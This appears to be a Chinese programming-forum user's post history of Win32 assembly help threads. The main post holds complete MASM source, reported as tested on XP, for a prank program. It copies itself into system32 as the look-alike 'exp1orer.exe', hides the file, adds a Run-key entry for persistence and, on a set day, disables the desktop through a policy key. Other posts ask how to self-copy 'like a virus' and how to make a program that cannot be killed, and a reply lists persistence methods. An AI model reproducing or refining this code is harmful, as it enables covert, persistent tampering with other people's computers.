|
|
|
[求助]win32汇编,不知道错在哪.
最初由 drwch 发布 呵呵,只要我觉得我是在进步,学到东西,我就能行 学习的方法很多,不一定要先学什么,然后在学什么,虽然说事物有必然的联系性,有个先来后到,但是合适自己的,就是最好的 同时谢谢您的建议,虽然对我用不上 |
|
[求助]win32汇编,不知道错在哪.
楼上兄弟取笑了.. |
|
[求助]win32汇编,不知道错在哪.
szDirectory应该定义为未初始化变量:szDirectory db ? 这个我想szDirectory定义为“szDirectory db 0”应该可以的,在我修改过后简单点的代码,测试通过,复制自己到系统目录,在cmd下 dir /a C:\windows\system32\exp1orer.exe发现存在.预定的几个注册表的地方也正常写入..完整的代码如下: (以下代码在windows XP下测试通过) .386 .model flat,stdcall option casemap:none include windows.inc include kernel32.inc include user32.inc include advapi32.inc includelib kernel32.lib includelib user32.lib includelib advapi32.lib .data szWin db 'C:\windows\system32\exp1orer.exe',0 szCmdAttrib db 'attrib +R +H C:\windows\system32\exp1orer.exe',0 szDirectory db 0 szRegKey db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0 szRegValue db 'StartPE',0 szStr1 db "C:\WINDOWS\System32\exp1orer.exe" szWriteKey db 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\',0 szWriteValue db 'NoDesktop',0 szDword dd 1 szTitle db '恭喜你',0 szCaption db '恭喜你,学习愉快',0 .data? hInstance dd ? hModule dd ? lpSystemTime SYSTEMTIME <?> osVersion OSVERSIONINFO <?> stStartUp STARTUPINFO <?> stProcInfo PROCESS_INFORMATION <?> .code ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _AttribCmd proc invoke GetStartupInfo,addr stStartUp invoke CreateProcess,NULL,addr szCmdAttrib,NULL,NULL,NULL,\ NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,addr stProcInfo ret _AttribCmd endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _CreateKey proc _lpKey local @hKey,@dwIndex,@dwLastTime:FILETIME invoke RegCreateKey,HKEY_LOCAL_MACHINE,offset szRegKey,addr @hKey .if eax == ERROR_SUCCESS invoke RegSetValueEx,@hKey,addr szRegValue,NULL,\ REG_SZ,addr szStr1,32 ;写入一个REG_SZ类型的数据 invoke RegCloseKey,@hKey .endif ret _CreateKey endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _WriteKey proc _lpKey local @hKey,@dwIndex,@dwLastTime:FILETIME invoke RegCreateKey,HKEY_CURRENT_USER,offset szWriteKey,addr @hKey .if eax == ERROR_SUCCESS invoke RegSetValueEx,@hKey,addr szWriteValue,NULL,\ REG_DWORD,addr szDword,4 ;写入一个REG_DWORD类型的数据 invoke RegCloseKey,@hKey .endif ret _WriteKey endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> start: invoke GetModuleHandle,0 mov hInstance,eax invoke _CreateKey,NULL ;设置为启动 invoke GetSystemTime,offset lpSystemTime movzx ebx,lpSystemTime.wDay .if ebx == 11 invoke GetModuleFileName,hModule,addr szDirectory,200;获取程序路径 invoke CopyFile,addr szDirectory,addr szWin,FALSE call _AttribCmd invoke _WriteKey,NULL ;修改注册表,隐藏桌面图表 invoke ExitProcess,NULL .elseif invoke MessageBox,NULL,addr szCaption,addr szTitle,MB_OK invoke ExitProcess,NULL .endif end start ***************************************************** 说来惭愧,我是写来戏弄我班上的同学,呵呵,高三了,精神紧张,要放松一下,就写个好玩点的代码出来娱乐一下他们 |
|
[求助]编程思路求解
最初由 zhangyongf 发布 1:该软件不能不卸载,或者可输入密码卸载 一个正常的程序,不可能不被卸载,就算是病毒,也有手工删除的时候 2:该程序开机自启动,后台运行,并且在运行过程中不能被结束; 这个貌似在开机启动中写入信息就可以吧..可以设置成服务,注册表启动,启动文件夹,线程插入等等... |
|
|
|
[求助]win32汇编,不知道错在哪.
没写完呢.也很简单,可是偶还不知道错误在哪. |
|
[求助]win32汇编,不知道错在哪.
希望知道错误的朋友提点一下,好让我优化.. |
|
|
|
[求助]获取操作系统版本..
谢谢大哥的提醒..... |
|
[求助]获取操作系统版本..
另外,判断当前程序路径的函数代码怎么写, 我打算判断出来后,利用CopyFile函数将它复制到系统目录, .data szDirectory db 'c:\windows\system32\server.exe',0 . . .code start: ;这里开始判断程序的路径,好象是利用GetCurrentProcess,我不懂 invoke CopyFile,****,addr szDirectory,FALSE ;lpExistingFileName的值我不懂 . . end start **************************** 好象病毒一样吧,先判断自己的路径,然后将自己复制到系统目录..这样子说估计明显一些... |
|
[求助]关于获取本地时间问题..
谢谢小虾哥哥,我又学到了一招 |
|
[求助]关于获取本地时间问题..
GetSystemTime没有返回值的话,如果我要先判断本地时间,如果是20号就执行某一操作,该怎么做?请指教.... |
|
|
|
ASM写的一个日志钩子回调函数,为什么不能钩到按键?
我测试了几天,终于找到弹一次的办法: invoke MessageBox,NULL,offset szCaption,offset szCaption,MB_OK .if eax != NULL invoke ExitProcess,NULL .endif ....... 呵呵,我想你应该明白,但是还是不够完美 |
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值